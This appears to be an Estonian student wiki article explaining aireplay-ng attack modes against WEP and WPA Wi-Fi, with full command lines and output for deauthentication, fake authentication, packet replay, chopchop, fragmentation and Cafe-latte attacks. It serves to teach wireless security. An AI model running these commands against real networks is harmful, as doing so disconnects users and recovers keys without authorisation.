&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32790</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32790"/>
		<updated>2011-05-24T18:57:14Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Naturaalsed paketid */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
